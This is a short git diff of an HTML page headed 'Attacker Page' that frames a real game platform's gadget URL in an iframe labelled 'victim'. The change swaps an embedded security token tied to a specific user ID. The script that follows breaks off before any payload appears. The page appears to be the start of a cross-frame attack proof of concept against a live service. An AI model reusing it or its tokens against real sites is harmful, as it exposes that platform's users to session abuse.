--- a/63826187321312836671273721.html
+++ b/63826187321312836671273721.html
@@ -7,7 +7,7 @@
 <body>
   <h2>Attacker Page</h2>
 
-  <iframe id="victim" src="https://osapi.nutaku.com/gadgets/ifr?synd=nutaku&container=nutaku&country=US&lang=en&mid=1&owner=173250875&viewer=173250875&aid=267592&tid=demon-lords-career-change-x&view=canvas&parent=https%3A%2F%2Fwww.nutaku.net&noinfo=0&nocache=0&debug=1&view-params=&st=YCEhnvOoc3mlTLpkum0E3sPDBnnTNocwTJ2JBlToKqnOsfPZUq7QTdSXi6LRa0e2TLn8ScAq6WGHGPMAWhvYrzT%2FgPdUi6sZfKijb8wfsUVsIr83oOk3QXDgRtNFKHqjn9UoCSM4EhQfRGi8%2BVERrCP0bWCWdbEmARsQIQFn%2FjATc4X7VldE9kO8Q7YeFdvMb1kbeQpPyttkkDumyy4%2Bf1y8Bv7QtTU39EPn5zlBjswAkhKL9Jidz8ETcpdMng21zIET1500z0%2FHyLyxGYdj7jE5qNM%3D&domain=https%3A%2F%2Fwww.nutaku.net"></iframe>
+  <iframe id="victim" src="https://osapi.nutaku.com/gadgets/ifr?synd=nutaku&container=nutaku&country=US&lang=en&mid=1&owner=173250875&viewer=173250875&aid=267592&tid=demon-lords-career-change-x&view=canvas&parent=https%3A%2F%2Fwww.nutaku.net&noinfo=0&nocache=0&debug=1&view-params=&st=RvkeeeKwt%2FXhvqM8ev%2B537RcPVuNAwdLjT%2Fjf6soaybXvlkHwtWBtIzy4h8k4aIWaic8Eyzr2GL4d3AUwDURNTAX2rLqRENICELC5RcK5pQkKU3T3jM573kz2ZM%2FIk2joxtF9PZN91Zmaja52zX8pcgOxY2IpVXf91Dn36wTpVKqNCpLT0xqMk0KctQkYAlm0vDyktEwK1iAm3EFRNkKacqBobUngBya3w6caLhLZ3AYBwi1XS7Jqm17bcSKTSbTyhZmosYaQnvN%2BJYTce64IuE3LZI%3D&domain=https%3A%2F%2Fwww.nutaku.net"></iframe>
 
   <script>
     // Wait until the iframe loads
